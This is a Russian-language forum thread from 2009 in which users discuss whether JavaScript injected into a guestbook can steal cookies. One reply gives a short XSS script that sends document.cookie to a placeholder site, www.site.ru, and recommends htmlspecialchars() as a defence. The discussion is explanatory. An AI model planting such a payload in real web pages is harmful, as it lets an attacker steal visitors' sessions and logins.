|
|
|
|
|
для: vrazbros
(14.03.2009 в 17:42)
| | Про XSS атаки слышали что нибудь? :)
PS
Кстати на этом форуме в смайликах XSS есть... | |
|
|
|
|
|
|
|
для: vrazbros
(14.03.2009 в 18:30)
| | Да, могут. | |
|
|
|
|
|
|
|
для: Slo_Nik
(14.03.2009 в 17:20)
| | те если я соглашусь на предложение FF сохранить пароли от доступа на сайт mysite.ru и недайбог попаду на сайт с таким js кодом то все мои пароли окажутся у злобного хакера ? :)
В не зависимости FF или IE ? | |
|
|
|
|
|
|
|
для: vrazbros
(14.03.2009 в 17:14)
| | JS сценарий (будем говорить о "вредном случае") запущенный от имени домена вашего, спокойно извлекет куки (а с ними он работать может), и, если надо, выпотрошит из них необходимое, и спокойно отошлет по назначению. А вот там где их "ждут", там уже РНР, но это уже другая история. | |
|
|
|
|
|
|
|
для: Mookapek
(14.03.2009 в 17:20)
| | я в шоке | |
|
|
|
|
|
|
|
для: vrazbros
(14.03.2009 в 16:36)
| | >не понимаю :) чем таким javascript может угрожать людям ? :)
таким ни чем угрожать не сможет, а вот если дописать этот скрипт правильно, как я понимаю, то можно натворить бед...
ведь всё это было написано для примера...
попроси знающих людей, пусть тебе покажут полностью скрипт, при помощи которого можно что то сделать плохое...
если такие найдутся и согласятся :)
p.s. было бы самому интересно посмотреть на такой скрипт, в javascript не разбираюсь, потому сам не сделаю....
p.s. вот, уже показали :):):):) | |
|
|
|
|
|
|
|
для: vrazbros
(14.03.2009 в 17:14)
| | Вот такой код -
<script>
location.href='http://www.site.ru/index.php?cookie='+escape(document.cookie);
</script>
|
- будет извлекать cookies и отправлять на сайт www.site.ru.
Этот код может прийти во входящих данных, поэтому надо обрабатывать их с помощью функции htmlspecialchars(). | |
|
|
|
|
|
|
|
для: sim5
(14.03.2009 в 17:02)
| | Просто для этого нужно как я понимаю присвоить кукисы клиента какойто переменной, потом ее сохранить в базе или отправить куда то по почте чтобы потом воспользоваться, а это уже php и если javascript кто то и вставит мне в гостевую книгу, то php он туда точно не вставит….я надеюсь :)
или я что то упустил ? | |
|
|
|
|
|
|
|
для: vrazbros
(14.03.2009 в 16:59)
| | А почему не вериться? И то и другое у клиента. | |
|
|
|
|
|
|
|
для: Mookapek
(14.03.2009 в 16:49)
| | что то слобо верится чтобы с помошью javasscript можно украсть cookies.... | |
|
|
|
|